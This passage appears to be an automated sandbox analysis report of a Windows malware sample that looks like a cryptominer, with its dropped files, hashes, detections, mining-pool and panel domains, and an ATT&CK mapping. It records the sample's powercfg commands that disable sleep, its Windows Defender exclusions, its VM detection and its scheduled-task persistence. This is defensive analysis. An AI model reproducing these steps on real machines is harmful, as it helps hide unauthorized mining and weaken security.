    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\System32\conhost.exeCode function: 58_2_00007FF6935D6770 GetSystemTimeAsFileTime,58_2_00007FF6935D6770

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Modifies power options to not sleep / hibernate
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter    		11
    Windows Service    		11
    Windows Service    		133
    Masquerading    		1
    Credential API Hooking    		1
    System Time Discovery    		Remote Services1
    Credential API Hooking    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts1
    Scheduled Task/Job    		1
    Scheduled Task/Job    		311
    Process Injection    		1
    Disable or Modify Tools    		LSASS Memory331
    Security Software Discovery    		Remote Desktop Protocol1
    Archive Collected Data    		Exfiltration Over Bluetooth1
    Non-Application Layer Protocol    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts1
    Service Execution    		1
    DLL Side-Loading    		1
    Scheduled Task/Job    		1
    Modify Registry    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local Accounts1
    Native API    		Logon Script (Mac)1
    DLL Side-Loading    		121
    Virtualization/Sandbox Evasion    		NTDS121
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script311
    Process Injection    		LSA Secrets1
    Application Window Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Deobfuscate/Decode Files or Information    		Cached Domain Credentials112
    System Information Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items3
    Obfuscated Files or Information    		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading    		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
    File Deletion    		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 735874 Sample: 8iTXwpHCHb.exe Startdate: 02/11/2022 Architecture: WINDOWS Score: 100 61 panel294756.site 2->61 63 pool.hashvault.pro 2->63 65 Snort IDS alert for network traffic 2->65 67 Antivirus detection for dropped file 2->67 69 Antivirus / Scanner detection for submitted sample 2->69 71 10 other signatures 2->71 9 WindowsAutHost 3 2->9         started        13 8iTXwpHCHb.exe 2 2->13         started        signatures3 process4 file5 55 C:\Windows\Temp\34E5.tmp, PE32+ 9->55 dropped 57 C:\Program Filesbehaviorgraphoogle\Libs\WR64.sys, PE32+ 9->57 dropped 75 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->75 77 Query firmware table information (likely to detect VMs) 9->77 79 Protects its processes via BreakOnTermination flag 9->79 85 4 other signatures 9->85 15 cmd.exe 9->15         started        18 cmd.exe 9->18         started        20 conhost.exe 9->20         started        28 3 other processes 9->28 59 C:\Program Files\...\WindowsAutHost, PE32+ 13->59 dropped 81 Adds a directory exclusion to Windows Defender 13->81 83 Tries to evade analysis by execution special instruction (VM detection) 13->83 22 cmd.exe 1 13->22         started        24 powershell.exe 19 13->24         started        26 cmd.exe 1 13->26         started        30 3 other processes 13->30 signatures6 process7 signatures8 39 11 other processes 15->39 41 5 other processes 18->41 87 Adds a directory exclusion to Windows Defender 20->87 32 cmd.exe 20->32         started        34 powershell.exe 20->34         started        89 Uses cmd line tools excessively to alter registry or file data 22->89 91 Uses powercfg.exe to modify the power settings 22->91 93 Modifies power options to not sleep / hibernate 22->93 43 11 other processes 22->43 95 Uses schtasks.exe or at.exe to add and modify task schedules 24->95 36 conhost.exe 24->36         started        45 5 other processes 26->45 97 Creates files in the system32 config directory 28->97 47 4 other processes 28->47 49 5 other processes 30->49 process9 signatures10 51 conhost.exe 32->51         started        53 conhost.exe 34->53         started        73 Adds a directory exclusion to Windows Defender 36->73 process11

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    8iTXwpHCHb.exe37%VirustotalBrowse
    8iTXwpHCHb.exe26%ReversingLabsWin64.Trojan.Lazy
    8iTXwpHCHb.exe100%AviraHEUR/AGEN.1249215
    8iTXwpHCHb.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Program Files\WindowsServices\WindowsAutHost100%AviraHEUR/AGEN.1249215
    C:\Program Files\WindowsServices\WindowsAutHost100%Joe Sandbox ML
    C:\Program Files\Google\Libs\WR64.sys5%ReversingLabs
    C:\Program Files\Google\Libs\WR64.sys0%MetadefenderBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://go.microsoft.c0%URL Reputationsafe
    https://go.microsoft.c0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    http://crl.microsof0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    http://crl.osofts/Microt00%URL Reputationsafe
    http://www.microsoft.coDk0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    panel294756.site
    		31.31.198.106
    		truetrue
      		unknown
      pool.hashvault.pro
      		199.247.19.116
      		truefalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.413252609.00000237D95BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://go.microsoft.cpowershell.exe, 00000026.00000002.644851259.0000019FA7837000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.516178284.0000019FA7825000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.396775326.00000237C9768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://crl.microsofpowershell.exe, 00000007.00000002.419133402.00000237E1C6F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000003.375792050.00000237E1C6F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000003.392349439.00000237E1C6A000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://go.micropowershell.exe, 00000007.00000003.365569673.00000237CB1C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.448943625.0000020D0BCC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.627931463.0000019F909FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.629177405.0000019F90AAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.626183947.0000019F90914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.632077474.0000019F90C6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.627601047.0000019F909C5000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.396775326.00000237C9768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.413252609.00000237D95BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000026.00000002.639801187.0000019F9F49B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crl.osofts/Microt0powershell.exe, 00000026.00000002.644851259.0000019FA7837000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.516178284.0000019FA7825000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.microsoft.coDkpowershell.exe, 0000001A.00000002.470297536.0000020D2408B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.395084188.00000237C9561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.444436769.0000020D0BAC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.587356639.0000019F8F441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.587692706.0000023700001000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://github.com/Pester/Pesterpowershell.exe, 00000026.00000002.590838599.0000019F8F647000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      No contacted IP infos

                      General Information

                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:735874
                      Start date and time:2022-11-02 12:55:32 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 34s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:8iTXwpHCHb.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:66
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.spyw.evad.mine.winEXE@105/19@2/0
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HDC Information:
                      • Successful, ratio: 44.9% (good quality ratio 34.6%)
                      • Quality average: 61.9%
                      • Quality standard deviation: 39.3%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 39
                      • Number of non-executed functions: 98
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                      • Execution Graph export aborted for target powershell.exe, PID 5712 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 6104 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:56:40API Interceptor133x Sleep call for process: powershell.exe modified
                      12:57:08Task SchedulerRun new task: WindowsAutHost path: C:\Program Files\WindowsServices\WindowsAutHost
                      12:58:30API Interceptor1x Sleep call for process: conhost.exe modified
                      12:58:31API Interceptor1x Sleep call for process: WMIC.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      pool.hashvault.pro1D9DD4AE9D1BA20DBF36549110C16150525122F3AA7FD.exeGet hashmaliciousBrowse
                      • 136.244.80.197
                      ahraujX2G3.exeGet hashmaliciousBrowse
                      • 199.247.19.116
                      NCVVe1Xqfs.exeGet hashmaliciousBrowse
                      • 199.247.19.116
                      Qh2jNLL1bg.exeGet hashmaliciousBrowse
                      • 136.244.80.197
                      sC9jiRdqYZ.exeGet hashmaliciousBrowse
                      • 199.247.19.116
                      SecuriteInfo.com.Trojan.Generic.31723764.31681.24539.exeGet hashmaliciousBrowse
                      • 199.247.19.116
                      RV1ohxohke.exeGet hashmaliciousBrowse
                      • 136.244.80.197
                      SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exeGet hashmaliciousBrowse
                      • 199.247.19.116
                      oX8y79yTcs.exeGet hashmaliciousBrowse
                      • 199.247.19.116
                      GenshinHack v.7.2.exeGet hashmaliciousBrowse
                      • 131.153.56.98
                      cxbqjWw79R.exeGet hashmaliciousBrowse
                      • 131.153.56.98
                      KOSUJeOPJR.exeGet hashmaliciousBrowse
                      • 46.4.27.39
                      KOSUJeOPJR.exeGet hashmaliciousBrowse
                      • 131.153.56.98
                      h7pPvq39df.exeGet hashmaliciousBrowse
                      • 131.153.142.106
                      mDindyhHiy.exeGet hashmaliciousBrowse
                      • 131.153.56.98
                      ySBrm4hhNs.exeGet hashmaliciousBrowse
                      • 131.153.142.106
                      XE1s8BC6iA.exeGet hashmaliciousBrowse
                      • 142.132.131.248
                      XE1s8BC6iA.exeGet hashmaliciousBrowse
                      • 142.132.131.248
                      Tt6TKqEQY9.exeGet hashmaliciousBrowse
                      • 142.132.131.248
                      ZlubzN6S53.exeGet hashmaliciousBrowse
                      • 46.4.27.39

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Program Files\Google\Libs\WR64.sys

                      Download File
                      Process:C:\Program Files\WindowsServices\WindowsAutHost
                      File Type:PE32+ executable (native) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):14544
                      Entropy (8bit):6.2660301556221185
                      Encrypted:false
                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                      MD5:0C0195C48B6B8582FA6F6373032118DA
                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 5%
                      • Antivirus: Metadefender, Detection: 0%, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                      C:\Program Files\WindowsServices\WindowsAutHost

                      Download File
                      Process:C:\Users\user\Desktop\8iTXwpHCHb.exe
                      File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                      Category:dropped
                      Size (bytes):9861121
                      Entropy (8bit):7.96543135974881
                      Encrypted:false
                      SSDEEP:196608:lKhSUcGJi2WNOVCjJ81tMeO3PNa/fm9BPq+lIx2YBWO:KYWi2WqCjJMmc/b+lNk
                      MD5:5B8C8BDDB55534C3C0DDA7CB094EEC00
                      SHA1:462827378D1F9AEFE96F1A97ECDE09D9E76F86D4
                      SHA-256:124BF2342223005C220DDEC47863DD8A27BDBC933A3793FCB6B6ECCB202DAFC9
                      SHA-512:35C527544027860BCEA50B41F7E002262D8A837040DF68D050BBEC1E9326765BF73F1C19B0724A69A4C6F3B37A2BEA907079C695DDCB3C7F37D24625A599DD17
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....`c...............$......?................@....................................i....`... ..............................................................^.. a..............................................(....................Pu..............................text...............................`.P`.data...0};..0......................@.`..rdata...P....>.....................@.`@.pdata...8....?.....................@.0@.xdata.. 1...P?.....................@.0@.bss..........?.......................`..idata........?.....................@.0..CRT....x.....?.....................@.@..tls..........?.....................@.@..HJN.....d5...?..................... ..`.7Z\.........Pu.....................@....u4~....._...`u..`..................`..h.reloc...............p..............@.0@.rsrc................r..............@.0.................................................

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):45177
                      Entropy (8bit):5.074672989013172
                      Encrypted:false
                      SSDEEP:768:ceW8JV3IpNBQkj22h4iUx/aVkfrRJv5FLv0znHoE8ard3uKPSOdB8N/zltAHkhNY:ceJJV3CNBQkj22h4iUx/aVkflJnLvAH/
                      MD5:FA0D737CAF174B5F1E345D9302DF942F
                      SHA1:270BF566DE3479E185B9B7880E5D8BD0D6796C52
                      SHA-256:507B7978B6A9D4C029ECD3D983BB21697D35703019870C19B7CB0A6C64913248
                      SHA-512:9EDFCBB2D9E75A95BBB3D0467DB520DE3FC1BB445A4BF46D84BA6ADA6B7E97D846293B7DB645601A9E7FD3330C6C0F3E85056B1A93C50B8166C8EE33721DF86B
                      Malicious:false
                      Preview:PSMODULECACHE.F..._.%.....?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........_.o.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1108
                      Entropy (8bit):5.276167954484878
                      Encrypted:false
                      SSDEEP:24:3DPpQrLAo4KAxX5qRPD42HZFe9t4CvKuKnKE4T:TPerB4nqRL/HZFe9t4Cv94zg
                      MD5:31AF022FC957818F9BBA7E437752B2AF
                      SHA1:C911377C86870A254A3803108594DD85C0BCB8C4
                      SHA-256:A4608855FE7FEBA2460978A9464769D9C21EC1D1CADC9FD1207D2D23289D58A7
                      SHA-512:F95F4E24ECEC05CD2B353F3D18D209CD94BDCAA30F7A96FAC5365310001C9A638DF131FE3128D0E1B345202186DBEB14A1A62FAF3EBE65B318A5C4FDAAE136CD
                      Malicious:false
                      Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tnpkimi.laq.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chgbrtw0.fh4.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcszdjva.jzu.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szedog1z.hih.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwxa34ej.zqi.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0e35txx.ryj.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):45177
                      Entropy (8bit):5.074672989013172
                      Encrypted:false
                      SSDEEP:768:ceW8JV3IpNBQkj22h4iUx/aVkfrRJv5FLv0znHoE8ard3uKPSOdB8N/zltAHkhNY:ceJJV3CNBQkj22h4iUx/aVkflJnLvAH/
                      MD5:FA0D737CAF174B5F1E345D9302DF942F
                      SHA1:270BF566DE3479E185B9B7880E5D8BD0D6796C52
                      SHA-256:507B7978B6A9D4C029ECD3D983BB21697D35703019870C19B7CB0A6C64913248
                      SHA-512:9EDFCBB2D9E75A95BBB3D0467DB520DE3FC1BB445A4BF46D84BA6ADA6B7E97D846293B7DB645601A9E7FD3330C6C0F3E85056B1A93C50B8166C8EE33721DF86B
                      Malicious:false
